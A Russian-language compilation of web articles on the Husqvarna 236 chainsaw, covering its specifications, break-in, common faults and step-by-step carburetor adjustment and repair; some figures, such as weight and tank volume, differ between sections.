542 просмотров
Рейтинг статьи
1 звезда2 звезды3 звезды4 звезды5 звезд
Загрузка...

Устройство карбюратора хускварна 236

Бензопила Хускварна (Husqvarna) 236: особенности, характеристики, ремонт своими руками

Пилы бренда Хускварна представлены многими моделями, которые включают инструменты профессионального и бытового класса. Надежность и выносливость этих бензопил доказывает высокий спрос на них. Простота конструкции с доступностью запчастей делает инструмент удобными в обслуживании. Страна-производитель этих бензопил – Швеция. Бренд зарекомендовал себя на мировом рынке как производитель качественных инструментов для широкого пользования. Рассмотрим устройство и характеристики на примере бензопилы Husqvarna 236. Несмотря на невысокую стоимость, для ее изготовления используются качественные материалы, дизайн удобный и эргономичный, а сборка очень точная и надежная.

Конструкция и особенности Хускварна 236

Схема строения бензопилы представлена на картинке ниже:

Конструкция бензопилы Хускварна 236 обеспечивает комфорт и безопасность оператора. Предусмотрен аварийный тормоз с быстрой остановкой механизма. Также в наличии система улавливания слетевшей цепи, что уберегает от случайных травм при работе. Система очистки воздуха центробежная, способствует эффективному охлаждению. Защита от вибрации снижает нагрузку на оператора, позволяет длительное время работать без перерывов. Топливная система оборудована с учетом стандартов экологичности, дополнительно очищает выхлопные газы от вредных соединений. Уменьшения расхода топлива достигнуто с помощью оборудования бензопилы Husqvarna 236 X-torq – инновационной системой, которая сокращает расход горючего на 20%.

Преимущества и технические характеристики пилы Husqvarna 236

Бензопила Хускварна 236 отличается своей универсальность, способна выполнять широкий спектр работ. Сюда относятся как тяжелые работы по валке деревьев, заготовке дров, так и работы по обрезке кустарников, формированию крон садовых деревьев. Для своего бытового класса модель оптимальная по соотношению «цена-качество». На ней установлен производительный двигатель с достаточным моторесурсом. Эргономичный дизайн и безопасная рукоятка обеспечивают удобство при работе, переключении режимов. Качественная сборка инструмента продлевает срок службы, особенно если следовать инструкции по эксплуатации. При серьезных поломках отремонтировать пилу можно своими руками, приобретя оригинальные запасные детали. Также высокая степень унификации инструментов бренда позволяет осуществлять замену запчастей между моделями одного типа.

В остальном бензопила Хускварна 236 имеет такие технические характеристики:

  • мощность – 1,9 л. с.;
  • вместительность бака для горючего – 300 мл;
  • бачок для масла – 200 мл;
  • длина шины – 35 см;
  • шаг цепи – 3/8 дюйма;
  • количество звеньев – 52;
  • габариты – 540*270*282;
  • вес – 7,37 кг.

Особенности эксплуатации модели

Придерживаясь рекомендаций по эксплуатации от производителя, Вы значительно продлите срок службы бензопилы, убережете ее от преждевременного ремонта. Одно из основных требований – использование качественных горюче-смазочных материалов. Заправлять пилу следует смесью бензина с маслом в пропорции 1:40. Подходит бензин марок АИ-92 или 95. Масло подбирается исходя из условий эксплуатации. Это может быть как минеральное масло, так и синтетика. Второй вариант более дорогой, но все же эффективнее.

Важно также правильно произвести обкатку инструмента. Она проводится по такому алгоритму:

  1. Заведите бензопилу и прогрейте ее в течение нескольких минут.
  2. Поработайте инструментом около получаса в режиме легких нагрузок, распиливая тонкие ветки.
  3. Далее можно постепенно увеличивать нагрузки.

Неисправности пилы Хускварна 236, их устранение

Есть также несколько типичных неисправностей бензопилы Хускварна 236. Бывают случаи, когда бензопила не заводится или глохнет при нажатии на газ. Причиной тому, скорее всего, износ сцепления. Чтобы снять и заменить механизм на новый, для начала открутите воздухофильтр и свечу зажигания. Аккуратно демонтируйте звездочку, катушку и шайбу. Установите новую звездочку сцепления, соберите механизм в том же порядке. При возникновении посторонних звуков после первых нескольких запусков не стоит беспокоиться – ведущая звездочка может немного проворачиваться, пока не встанет на место.

Еще одна частая проблема – отсутствие поступление масла на цепь для бензопилы Husqvarna 236. В таком случае проверьте исправность масляного насоса и герметичность шлангов. Для устранения данной неполадки действуйте в такой последовательности:

  • снимите защитную крышку, пружину стартера и воздухофильтр;
  • справа под фильтром расположен насос. Осмотрите его на наличие повреждений. При необходимости замените;
  • осмотрите качество шлангов, их крепление. При необходимости также стоит заменить их.

Как отрегулировать карбюратор бензопилы Хускварна 236?

Регулировка карбюратора бензопилы Хускварна 236 необходима при проблемах с холостым ходом или когда инструмент глохнет при увеличении газа. Также перенастройку карбюратора следует выполнять при изменении условий эксплуатации. Его устройство достаточно простое и понятное, с настройкой справится любой пользователь. Основные регулировочные винты изображено на фото ниже:

Правильно отрегулировать карбюратор можно в такой последовательности:

  1. Прогрейте двигатель около 5 минут.
  2. Проверните винт L до максимальных оборотов, сразу же верните его на четверть оборота назад.
  3. Удерживая ручку газа, проверните винт Н на четверть оборота вперед.
  4. Через 10 секунд опустите газ и проверните винт Т по часовой стрелке до начала движения цепи. Сразу же после этого начните проворачивать винт назад до остановки цепи.

Для большей наглядности предлагаем также ознакомиться с видео, на котором продемонстрирован процесс регулировки:

Регулировка карбюратора бензопилы walbro правильно

Бензопилы — мощные и ценные инструменты. Они применяются в промышленности, строительстве и в жилищном хозяйстве и являются основным режущим инструментом для 50% всей заготавливаемой древесины в мире, поэтому регулировка карбюратора бензопилы имеет важное значение для безопасной работы операторов.

Конструкция простейшей бензопилы

Первый патент США № 780 476 на «бесконечную цепную пилу» был предоставлен Самуэлю Дж. Бенсу из Сан-Франциско 17 января 1905 года. Это была огромная статическая пилорежущая машина по дереву. В основном Бенс разработал принцип функционирования пилы, но в новом изобретении не был указан источник её питания. К пиле прилагался любой внешний источник — паровой или газовый двигатель. Только 16 лет спустя, в 1921 году, он подал ещё один патент No 1617565 на переносную цепную пилу с автономным источником питания.

Устройство и внутреннее строение бензопилы с тех пор особо не изменилось. Она имеет две основные части: режущий диск, встроенный в цепочку, обёрнутый вокруг длинного металлического направляющего стержня, и небольшой бензиновый двигатель с одним цилиндром (иногда это электрический двигатель, питаемый от электросети или аккумуляторной батареи). Цепь немного похожа на цепь велосипеда, бегущую вокруг звёздочек — шестерни, предназначенной для поворота цепи, только с 30 острыми зубьями (изготовленными из закалённого стального сплава), размещённых с интервалом.

Принцип работы пилы заключается в том, что она превращает химическую энергию бензина в механическую энергию, которая приводит в движение цепь. Обычно резервуар для бензина вмещает всего 0, 5 литра. Бензин подаётся через карбюратор, где смешивается с воздухом. Воздушно — бензиновая смесь переходит в цилиндр, который работает так же, как и в двигателе автомобиля, но с простым двухтактным циклом вместо более сложного четырехтактного, используемого в автомобиле.

Внутри цилиндра воздушно-топливная смесь зажигается искровой свечой, бензин высвобождает свою энергию и толкает поршень вперёд. Поршень в бензопиле обычно имеет диаметр около 45 мм и ход около 33 мм. Кривошипно-шатунный механизм преобразовывает возвратно-поступательное движение поршня к вращательному движению звёздочки, на которую насажена цепь.

Центробежная муфта соединяет двигатель и цепь. Механизмы несут мощность от сцепления до звёздочки, которая удерживает цепь. Цепь вращается вокруг края длинноствольной пластины, называемой направляющей штангой.

Преимущества и недостатки режущего устройства

Бензопилы стали востребованными с тех пор, как промышленность стала выпускать экономичные, недорогие устройства, рассчитанные на широкий потребительский диапазон. Они стали доступными по цене и практически полностью заменили ручные пилы. Преимущества бензопилы:

  1. Скорость обработки древесины в 5−10 раз быстрее обычной ручной пилы.
  2. Простота использования в боковом направлении.

Недостатки:

  1. Низкая безопасность в эксплуатации. Самый большой риск травмирования, когда цепь зацепляется за что-то твёрдое, а двигатель продолжает работать, происходит обрыв цепи, что может привести к смертельным травмам. Рекомендуется при работе с таким инструментом носить специальные защитные шлемы и очки.
  2. Необходимость обслуживания. В цепной пиле тонкая пыль попадает в механизм, смешивается с маслом смазки цепи и создаёт плотную грязь, поэтому она нуждается в регулярной чистке.

Безопасное регулирование карбюратора

Правильная экономичная работа пилы в целом зависит от настройки её параметров. Регулировка бензопилы базируется на трёх основных элементах для правильного запуска двигателя:

  • правильное сжатие;
  • правильная искра;
  • правильное топливо.

Полезно также знать 3 общие проблемы бензопил:

  1. Свечи зажигания, недорогие и легко заменяемые.
  2. Топливные линии, недорогие и не слишком сложные для замены.
  3. Карбюраторы, возможна только корректировка либо полная замена, стоимость нового, китайского производства, примерно 10 долларов США.

Газовую линию можно протестировать с помощью датчика, аналогичного тому, которым пользуются для проверки автомобильных шин. Он имеет конический резиновый наконечник, который прижимается к отверстию Spark Plug. Дёргая верёвку стартера, можно получить данные от прибора. Затем проверить провода, которые переходят в переключатель «ON — OFF». Они должны быть плотными и не касаться металла двигателя.

Карбюраторы бензопил могут иметь просачивание прокладок, деформированных клапанов и плохих топливных мембран насосов, заменяющихся с помощью заводского ремонтного комплекта.

Восстановление китайских карбюраторов

Ремонт карбюратора бензопилы своими руками выполнить несложно, для этого нужно понимать принцип его работы. Если двигатель запускается, но быстро глохнет, скорее всего, проблема с карбюратором и необходимо выполнить восстановление его в соответствии с инструкцией завода изготовителя. Инструменты для настройки бензопилы:

  1. Аллоновые ключи 7 / 16.
  2. Игольчатые плоскогубцы.
  3. Динамометрический ключ.
  4. Топливный контейнер.
  5. Рабочие перчатки.
  6. Ветошь.

Перед началом работ необходимо снять острую цепь, чтобы не травмироваться во время ремонта. Порядок работ, характерный для типовой модели пилы:

  • Шаг 1: Освободить топливный бак. В хорошо проветриваемом помещении снять крышку топливного бака и вылить топливо в контейнер для хранения. Снять топливный колпачок.
  • Шаг 2: Используя шестигранный ключ, снять винты, удерживающие экран цилиндра на двигателе. Снять крышку и экран цилиндра.
  • Шаг 3: Отсоединить провод свечи зажигания и снять воздушный фильтр.
  • Шаг 4: Снять гайки крепления карбюратора. Используя драйвер гнёзд 7 / 16, снять две крепёжные гайки, которые крепят карбюратор к двигателю.
  • Шаг 5: Отсоединить корпус воздушного фильтра и настроить его работу. Вытянуть корпус воздушного фильтра из карбюратора.
  • Шаг 6: Вытянуть карбюратор от блока цилиндров. Делать это следует осторожно, чтобы не согнуть рычаг дроссельной заслонки или не повредить газовые линии. Сдвинуть карбюратор с крепёжных шпилек. Удалить газовые линии.
  • Шаг 7: Отсоединить рычаг дроссельной заслонки. Полностью вытащить карбюратор с монтажных шпилек.
  • Шаг 8: Поместить карбюратор на чистую рабочую поверхность и снять винты с нижней крышки. Отсоединить крышку. Очистить измерительную диафрагму и прокладку с нижней части карбюратора. Чтобы ускорить сборку, сделать цифровые фотографии деталей перед их снятием.
  • Шаг 9: Снять винт, крепящий иглу и рычаг подачи топлива. Очистить все входы в карбюратор сжатым воздухом. Дать карбюратору высохнуть в течение как минимум 10 минут.
  • Шаг 10: Собрать карбюратор (штиль 250). Установить иглу и рычаг карбюратора. Установить дозирующую диафрагму, прокладку и нижнюю крышку. Установить диафрагму насоса и верхнюю крышку.
  • Шаг 11: Заменить уплотнительную прокладку карбюратора. Подключить дроссельную заслонку. Повернуть карбюратор на монтажные шпильки и вставить его на место. Подключить топливопроводы.
  • Шаг 12: Заменить крепёжные гайки и затянуть их, чтобы уплотнить прокладку между двигателем и карбюратором. Во избежание повреждения прокладки, затянув крепёжные гайки, используют динамометрический ключ.
  • Шаг 13: Установить крышку воздушного фильтра и подключить свечу зажигания.
  • Шаг 14: Установить на место цилиндрическую крышку на цепную пилу. Заполнить топливный бак и можно начинать бензопилить.

Правильная настройка

Регулировка карбюратора бензопилы и бензокос имеет решающее значение для цепных пил и других двухтактных двигателей. Корректировка, которая даёт слишком богатую смесь, приведёт к тому, что пила будет иметь недостаточную мощность, к увеличению количества углерода и может повредить двигатель. Правильная настройка карбюратора позволит производить максимальную мощность оборудования, продлевать рабочий цикл двигателя, производить минимальные выхлопы, работать плавно и бесперебойно. Большинство цепных пил имеют три крепёжных винта карбюратора:

  1. Остановка дроссельной заслонки — регулировка, определяющая, насколько клапан дроссельной заслонки остаётся открытым, когда спусковой механизм дроссельной заслонки высвобождается. Если эта настройка установлена малой, двигатель заглохнет при отпускании триггера дроссельной заслонки.
  2. Регулировка низкоскоростного топлива (L) — регулировка, которая контролирует топливо на холостом ходу.
  3. Высокоскоростная регулировка топлива (H) — контролирует долю топлива при номинальной скорости работы. Это самая важная настройка.

Следует отметить, что в некоторых конструкциях цепных пил отсутствует высокоскоростная регулировочная игла. Эти пилы имеют так называемую неподвижную струю, которая устанавливается заводом. Карбюраторы с неподвижной струёй используются, чтобы запретить оператору устанавливать самостоятельно регулировку, что может повредить пилу. К сожалению, такие заводские настройки часто не позволяют пиле достичь максимальной производительности.

Базовая настройка Husqvarna’s 236

Необходимо регулярно настраивать бензопилу Husqvarna, чтобы обеспечить хорошую производительность и предотвратить повреждение, вызванное нерегулярным двигателем. Три винта на карбюраторе хускварна 236, 361 используются для точной настройки двигателя, чтобы обеспечить плавную работу.

Основные требования настройки:

  • Фильтр воздушный должен быть чистым. При карбюраторе с загрязнённым воздушным фильтром пила будет выдавать слишком обеднённую топливную смесь. Это может привести к серьёзному повреждению двигателя.
  • Цепь не должна быть натянута больше, чем на 0, 2 дюйма.
  • Замена H — иглы или нужного карбюратора полностью: осторожно ввинтите новую H — иглу в нижнюю часть и поверните её против часовой стрелки.
  • Запустите двигатель. При необходимости отрегулируйте скорость холостого хода с помощью T — образного винта.

Поиск и устранение неисправностей Walbro

Корректировка и исправление проблем, обнаруженных на Walbro Carburetors:

  • Шаг 1. Проверить фильтр воздушный walbro, чтобы убедиться, что он не забит опилками или другим мусором, и бак заполнен бензином более, чем наполовину.
  • Шаг 2. Запустить двигатель и дать ему возможность работать в режиме холостого хода в течение нескольких минут, чтобы он нагрелся.
  • Шаг 3. Прикрепить тахометр к пиле. На всех этапах отслеживайте число оборотов. Для большинства пил рекомендуемая скорость холостого хода составляет 2700 об / мин.
  • Шаг 4. Отрегулировать правильно скорость холостого хода пилы с помощью плоской отвёртки на винте «T». Затягивание винта уменьшает насыщенность топливной смеси, а ослабление имеет противоположный эффект.
  • Шаг 5. Отрегулировать винт «L», медленно затянув его до тех пор, пока двигатель не начнёт глохнуть. Обратить внимание на положение и ослабить винт- скорее всего, посредине между двумя настройками.
  • Шаг 6. Вернуться к винту «T» и отрегулировать его снова, так как есть вероятность того, что регулировка винта «L» может изменить оптимизированные настройки топлива на холостом ходу .
  • Шаг 7. Дать возможность пиле полностью открыть дроссель и отрегулировать винт «H», установив его между двумя точками, где пила работает ровно.
  • Шаг 8. Отпустить дроссель и снова проверить настройку винта «L», внеся необходимые корректировки.
  • Шаг 9. Вернутся к винту «T» и отрегулировать скорость холостого хода пилы вальбро в последний раз. Это последний параметр настройки, и пила теперь готова к работе.

Производители и их партнёры нечасто заявляют о новых и интересных инновациях своего оборудования. Не секрет, что конструкция бензопилы не изменилась за последнее десятилетие. В последнее время появились инновации, которые включают новейшие технологии производства сверхнадежных бензопил для среднего покупателя. Сред них- инструмент со встроенным Wi — Fi, сообщающий пользователю о своем общем состоянии через приложение для смартфонов.

Бензопила «Husqvarna» 236: особенности, характеристики и ремонт своими руками

Бензопила «Husqvarna» 236 X Torq – отличный бытовой инструмент от известного шведского бренда «Хускварна». По своим техническим и функциональным достоинствам считается преемницей более ранней модели «Husqvarna» 137.

Как базовый аналог, она не рассчитана на коммерческую эксплуатацию – на лесоповалах, деревообрабатывающих производствах. Идеальными сферами, где эта бензопила нашла свое применение, считаются садовые работы, ландшафтный дизайн, заготовка пиломатериалов, ремонт и строительство на бытовом уровне сложности. Благодаря инновационным технологиям с этим агрегатом можно работать как на свежем воздухе, так и в закрытых непроветриваемых помещениях.

Бензопила «Хускварна» 236 – единство экологичности, экономичности, современных конструкторских решений и лучших европейских традиций пилопроизводства.

Особенности

Двигатель, объем которого 38 см 3 , генерирует 1,4 кВт мощности. Максимальные обороты бензопилы при такой нагрузке составляют 9 тыс. об/мин, а на холостом ходу – всего 3 тыс. Системы, работающие с жидкостями – топливной смесью и смазкой для цепи, полностью автоматизированы для автономной и продолжительной работы.

Достоинства

Технические характеристики бензопилы

Особых недостатков этой бензопилы «Хускварна» обнаружено не было. Момент, с которым придется столкнуться, это дороговизна рекомендуемых к использованию расходных и смазочных материалов.

Неисправности бензопилы «Husqvarna» 236

Согласно официальной статистике, 5 ее наиболее уязвимыми системами считаются:

  • моторная;
  • глушитель;
  • карбюратор;
  • подача смазки;
  • инерционное торможение.

Проявления неполадок первой группы:

  • мотор не заводится или функционирует не стабильно;
  • запускается с периодическими проглохами;
  • не держит холостой ход;
  • дымит и не создает указанное производителем тяговое усилие.

Кроме выше упомянутых, есть еще одна проблема, на которой мы остановимся подробнее.

Мотор глохнет при нажатии на газ: причины и их устранение

  • засорение топливного фильтра;
  • разгерметизация топливных шлангов;
  • неисправность глушителя;
  • заклинивание клапана в поплавковой камере за счет чего смесь не поступает в полном объеме;
  • загрязненность воздушного фильтра;
  • выход из строя сальников коленвала.

Устранение всех обозначенных причин сводится к:

  • прочистке рабочих органов, связанных с жидкостями или воздушной рабочей средой;
  • внешнему осмотру перечисленных деталей на предмет неполадок;
  • заменен старых запчастей новыми.

Немаловажную роль для стабилизации рабочего хода бензопилы «Хускварна» имеет правильная регулировка карбюратора, которая вполне осуществима и в домашних условиях.

Регулировка карбюратора «Husqvarna» 236 своими руками

Вопрос о том, как отрегулировать карбюратор бензопилы 236-й модели, достаточно актуален. Рассматриваемая модификация бензопилы имеет карбюратор от бренда «Zama», конструкция которого содержит ускорительный насос. Любая ситуация, которая сопровождается нестабильной работой двигателя прибора, образованием обильного количества выхлопов и резким ростом потребления топливной смеси, говорит о необходимости его перенастройки.

Она производится в несколько этапов:

  • закручивание винтов H и L по часовой стрелке;
  • установка оборотов холостого хода и максимальных – проворачивание жиклеров по часовой стрелке их повысит. Для этого потребуется тахометр и инструкция по эксплуатации с номинальными параметрами двигателя.

Если мотор ровно работает под нагрузкой и вхолостую, цепь неподвижна на холостом ходу – перенастройка карбюратора прошла успешно.

Неприхотливость – преимущество оригинальных бензопил «Хускварна», страна производитель которых Швеция. К сожалению, этого не скажешь о китайских подделках, которые не предсказуемы в эксплуатации и ремонте.

Регулировка карбюратора бензопилы Хускварна

Современные бензопилы имеют сложную систему и состоят из нескольких основных узлов, которые периодически требуют обслуживания и регулировки. В этой статье поговорим о том, как отрегулировать карбюратор на бензопиле Хускварна.

В каких случаях карбюратор бензопилы Хускварна требует регулировки

Проблем, решением которых может стать регулировка карбюратора, достаточно много. Регулировка карбюратора бензопилы Хускварна необходима при появлении таких неисправностей, как:

  • повышенные обороты холостого хода;
  • сильное дымление при работе инструмента;
  • затруднённый запуск холодного или горячего двигателя;
  • отсутствие тяги и пониженные максимальные обороты.

Это отнюдь не полный список проблем, решением которых может стать настройка карбюратора Хускварны. В ряде случаев, настройка качества и количества топливной смеси проводится после проведения капитального ремонта двигателя или в процессе планового ТО бензопилы.

Производитель Хускварна АВ рекомендует проводить регулировку карбюратора до и после проведения обкатки.

Устройство и принцип работы карбюратора Хускварна

Для успешного проведения настройки карбюратора бензопилы Хускварна необходимо знать его устройство и понимать то, как он работает. На самом деле все не так сложно, как кажется на первый взгляд.

Карбюратор пилы имеет встроенный топливный насос, который отвечает за транспортировку смеси бензина с маслом, а также диафрагму, игольчатый клапан с коромыслом. Их совместная работа позволяет дозировать подачу топлива в главную камеру и две заслонки.

Одна из заслонок предназначена для регулировки подачи топлива в цилиндр при нажатии на газ, она называется дроссельной, вторая — отвечает за ограничение подачи воздуха из воздушного фильтра для облегчения запуска холодной бензопилы Хускварна. В тот момент, когда оператор перекрывает при помощи воздушной заслонки подачу воздуха в карбюратор, происходит обеднение топливной смеси и увеличение её подачи в цилиндр, за счет чего бензопила запускается намного легче, чем в том случае, когда холодный запуск проводится в обычном режиме.

В работе карбюратора Хускварны участвует клапан-форсунка, которая распыляет топливо и предотвращает поступление воздуха в основную камеру. Часто проблемы при работе пилы могут быть вызваны дефектами именно этого элемента. Например, клапан, при неправильном хранении бензопилы может залипнуть, подача топлива прекратится, что сделает работу двигателя невозможным. Также нарушения в работе форсунки могут стать причиной подсоса воздуха в главную топливную камеру карбюратора. В таких случаях корректировка положения регулировочных винтов не исправит ситуации, понадобится проведение ремонта или замена узла.

За настройку качества и количества смеси, а так же количество оборотов коленчатого вала в холостом режиме отвечают три регулировочных винта, установленных в корпусе карбюратора:

  • винт (L) – регулирует количество топлива в режиме низких и средних оборотов;
  • (H) – отвечает за тягу на высоких оборотах и их количество;
  • (Т) – изменяет положение заслонки дросселя, тем самым регулирует количество топливной смеси, поступающей в цилиндр и работу двигателя инструмента в режиме холостого хода.

Винты (L) и (H) нельзя регулировать, не имея определенных знаний и опыта. Неправильная настройка качества и количества топливной смеси может привести к тому, что двигатель перестанет работать или будет работать неправильно, что приведет к его быстрому износу или даже заклиниванию.

Инструменты необходимые для проведения работ

Прежде чем приступить к настройке карбюратора Хускварны, необходимо позаботиться о наличии всего инструмента, который может пригодиться. Для проведения данного типа работ самостоятельно, понадобится:

  • отвертка для регулировки винтов (H) и (L), её можно купить в специализированных магазинах;
  • электронный тахометр для определения показаний частотности вращения коленчатого вала (имея определенный опыт, можно провести регулировку на слух);
  • крестовая отвертка, для регулировки винта (T);
  • компрессор с продувочным пистолетом, для чистки пилы перед проведением работ.

Обычная шлицевая отвертка для регулировки не подойдет, т. к. регулировочные винты на бензопилах Хускварна могут иметь различное сечение. Придется приобрести специальную, в этом особенность ремонта бензопил Хускварна, они сделали все, чтобы пилу можно было отремонтировать только в специализированном сервисе Husqvarna.

Алгоритм и описание настройки карбюратора Хускварна

Карбюратор Хускварна, регулируется аналогично тому, как происходит настройка карбюраторов на бензопилах других производителей.

Непосредственно перед регулировкой, необходимо провести полную диагностику пилы и убедится в том, что отсутствует затруднение подачи топлива и подсос воздуха в картер бензопилы. Также необходимо убедиться в чистоте воздушного фильтра и при необходимости заменить его на новый.

Порядок проведения работ следующий:

  1. На заглушенной пиле устанавливаются заводские настройки карбюратора Хускварна.
  2. Производится запуск двигателя и прогрев пилы в течение нескольких минут.
  3. При помощи вращения винта (L) по часовой стрелки, находится положение, при котором двигатель развивает максимальные обороты, после чего винт необходимо отвернуть на 1⁄4 обратно. Если при этом цепь бензопилы вращается, то необходимо уменьшить обороты холостого хода, путем корректировки положения винта (Т).
  4. Следующий этап, это корректировка мощности Хускварны на максимальных оборотах и корректировка их количества. Для этого тахометр подключается к заведенной бензопиле, ручка газа выжимается на полную, после чего проверяются показания тахометра. Если значение максимальных оборотов отличается от максимального количества, рекомендованного производителем, то при помощи изменения положения винта (H) показания тахометра проводятся в норму.

Нюансы регулировки

После проведения регулировки, бензопила должна легко набирать и сбрасывать обороты, стабильно работать на низких и высоких оборотах. Если цепь пилы после проведения корректировки винтов управления карбюратором вращается на холостом ходу, это признак того, что настройка проведена неправильно и необходимо откорректировать положение винта (Т).

Также, при регулировке карбюратора Хускварна стоит учитывать время отклика бензопилы на вращение винтов. Настройки меняются не сразу, а в течение пяти, десяти секунд.

Один из показателей неправильно проведенной регулировки, это сильное дымление при работе пилы, что свидетельствует о большом количестве топлива, поступающем в камеру сгорания. При возникновении такой ситуации, нужно откорректировать положение винта (L).

Заводские настройки

Стандартные заводские настройки карбюратора Хускварна, это положение винтов (Н) и (L), в которых исправная бензопила должна гарантированно запустится. Для инструментов Хускварна, это полтора оборота от полностью закрученных винтов (Н) и (L). В процессе регулировки, необходимо сначала установить винты в стандартное положение, затем запустить бензопилу и провести точную корректировку мощности, количества максимальных оборотов и оборотов холостого хода.

Ремонт карбюратора своими руками

Если в процессе проведения полной диагностики бензопилы Хускварна были обнаружены дефекты карбюратора, то некоторые из них можно устранить без обращения в сервисный центр Husqvarna AB. Например, самостоятельно можно:

  • поменять прокладки под крышками главной камеры и топливного насоса;
  • очистить или заменить сетчатый фильтр;
  • заменить диафрагму или игольчатый клапан главной камеры;
  • устранить неисправности диафрагмы топливного насоса.

Прокладки, диафрагмы и игольчатый клапан с коромыслом, можно найти в ремкомплекте, который имеется для каждой модели карбюраторов бензопил Хускварна.

Также, при наличии определенного опыта, можно попытаться восстановить неисправную клапан-форсунку, но гарантировать положительный результат при попытке восстановления форсунки нельзя, при её неисправности, производители рекомендуют менять карбюратор полностью.

Первое что необходимо сделать, перед тем как снять карбюратор с Хускварны, это почистить пилу при помощи компрессора, т. к. грязь может помешать качественному проведению ремонта. Далее, нужно вскрыть верхнюю крышку бензопилы, снять воздушный фильтр, отсоединить тяги от рычагов управления воздушной и дроссельной заслонками. После этого открутить винты крепления карбюратора.

Разобрать корпус карбюратора для проведения ремонта достаточно просто. Крышка главной камеры удерживается четырьмя винтами, демонтировать которые можно при помощи обычной отверти, крышка топливного насоса закреплена при помощи одного широкого винта.

Ниже представлено видео, посмотрев которое станет понятно, как именно можно отремонтировать карбюратор без обращения в сервисный центр Husqvarna.

Вывод

Работу по настройке или ремонту карбюратора на бензопилах компании Хускварна можно выполнить и не имея определенного опыта. Для того чтобы сделать все правильно, необходимо соблюдать алгоритм и иметь минимальный набор инструментов. Также стоит заранее оценить свои силы и не рисковать, если вы совсем ничего не понимаете в технике. Поверьте, иногда лучше заплатить небольшую сумму мастеру, чем испортить инструмент самостоятельной регулировкой.

Бензопилы Husqvarna 236

Главные преимущества бензиновой пилы Husqvarna 236 заключаются в ее выносливости, простоте в повседневной эксплуатации и долговечности. Модель обладает высоким качеством фирменной заводской сборки и способностью быстро и эффективно распиливать древесину любого типа. Это делает шведский садовый инструмент пригодным не только для чистки деревьев, но и для выполнения различных задач во время строительства и ремонта.

Устройство бензопилы Husqvarna 236

От своих рыночных аналогов бензопила Husqvarna 236 отличается сбалансированной заводской сборкой, правильно установленным центром тяжести и отсутствием люфтов. В основу устройства садового инструмента вложен фирменный бензомотор, хромированный цилиндр которого имеет объем 38,2 см3. При разработке и производстве двигателя производителем была внедрена фирменная инновационная система XTorq, которая обеспечивает солидную экономию горючего и заметное снижение выбрасываемых в окружающую среду выхлопных газов.

Для запуска мотора бензопила Хускварна 236 комплектуется долговечным ручным стартером. За плавный и облегченный запуск холодного ДВС в устройстве модели отвечает насос для предварительной подкачки горючего. В базовую комплектацию мотора входит фирменная центробежная система очистки воздуха Airinjection, которая более эффективно фильтрует воздух, предотвращая, тем самым, быстрое засорение карбюратора. Для более удобной эксплуатации садового инструмента в его устройство входят стальные изолирующие пружины, которые отделяют рукоятки от работающего двигателя.

За непрерывную связь мотора и рабочих органов садового инструмента Husqvarna в его оснащении отвечает фирменная система сцепления, все запчасти которой изготовлены из кованых металлических сплавов. Механизм выдерживает интенсивное трение и длительную работу под высокими и переменными нагрузками.

Рабочие органы бензопилы Husqvarna представлены пильной гарнитурой, состоящей из кованой металлической 35-сантиметровой шины и цепи с 52 звеньями и шагом 3/8 «. За стабильную и непрерывную смазку гарнитуры отвечает встроенный масляный насос, исправно работающий в полностью автоматическом режиме. Насос гарантирует интенсивное вращение цепи с максимальной скоростью 16,3 м/c. Этого достаточно для эффективного распила даже самой твердой древесины.

Внутренние детали и рабочие механизмы фирменной бензопилы Husqvarna помещены в прочный корпус, изготовленный из ударостойкого пластика. В задней его части расположены все нужные для непрерывной работы кнопки, рычаги и переключатели.

Технические характеристики садового инструмента

Многофункциональности бензопилы Husqvarna на участке удалось достичь благодаря ее солидным заводским параметрам.

В перечень главных из них входит:

  • мощность бензомотора – 1,9 л. с.;
  • скорость вращения вала на холостых/максимальных оборотах – 3000/9000 об/мин;
  • рабочий вес с заполненными баками – 4,75 кг;
  • страна-производитель – Швеция.

Важное преимущество модели заключается в сниженном уровне шума во время ее работы. При работе двигателя под максимальными нагрузками этот параметры бензопилы Husqvarna 236 не превышает 113 дБ.

Комплект поставки модели

При заказе садового инструмента Husqvarna в 236-ой комплектации покупатель получает абсолютно все необходимое для самостоятельной сборки, а также дальнейшей эксплуатации и собственноручного обслуживания модели.

В набор входит:

  • ключи и отвертки;
  • металлические шина и цепь;
  • чехол для шины;
  • инструкция по эксплуатации.

При желании покупатель может дополнительно заказать фирменное масло для 2-тактных двигателей, цепь для бензопилы Husqvarna 236, а также сумку-чехол из непромокаемой ткани для транспортировки.

Регулировка карбюратора бензопилы Хускварна 236 своими руками

Настройка карбюратора садового инструмента предназначена, в первую очередь, для стабилизации работы двигателя.

О необходимости выполнения этой процедуры оператору бензопилы подскажут следующие признаки:

  • повышенное выделение дыма при работающем двигателе;
  • слишком высокие обороты во время работы ДВС на холостом ходу;
  • заниженные максимальные обороты и отсутствие требуемой тяги;
  • плохой запуск холодного и горячего мотора.

Кроме того, в некоторых случаях своевременная настройка карбюратора будет необходимой после проведения капитального ремонта бензопилы.

Чтобы отрегулировать карбюратор бензопилы Хускварна 236, ее владельцу нужно действовать в таком порядке:

  1. Сначала на пиле с холодным мотором нужно установить заводские настройки топливного узла. Чтобы узнать, в какое положение переводить винты, нужно изучить указания в инструкции по эксплуатации;
  2. Затем нужно завести ДВС и дать ему поработать до полного прогрева;
  3. Далее нужно начать вращение винта «L» по часовой стрелке до того момента, пока не будет найдена максимально стабильная работа мотора на высоких оборотах. Сразу после этого винт потребуется вывернуть на 1/4 оборота против часовой стрелки;
  4. После этого нужно обратить внимание на цепь. Если она вращается на шине, значит, оператор пилы должен отрегулировать положение винта «T». Для этого его нужно поочередно поворачивать в разные стороны до той поры, пока цепь не остановится;
  5. В конце останется настроить работу мотора на максимальных оборотах. Для этого нужно подключить к мотору тахометр и начать вращение винта «H». Как только обороты на приборе совпадут с указаниями в инструкции по эксплуатации пилы, вращение винта потребуется остановить.

После этого потребуется проверить работу пилы Husqvarna. Если мотора модели будет быстро набирать обороты при нажатии на курок газа, и также быстро терять их при отпускании курка, значит, настройка штатного карбюратора была выполнена правильно.

Бензопила Хускварна 236 не заводиться

Причин этой поломки может быть несколько. Первая из них заключается в засорении встроенного воздушного фильтра. В результате длительной эксплуатации пилы на поверхности фильтрующего элемента скапливается большое количество мусора и даже мелких насекомых. Из-за этого деталь перестает пропускать воздух, требуемый для обогащения топливной смеси. Чтобы решить эту проблему, нужно снять фильтр и промыть его в чистом бензине. После полного высыхания элемент необходимо установить на место и попытаться завести садовый инструмент.

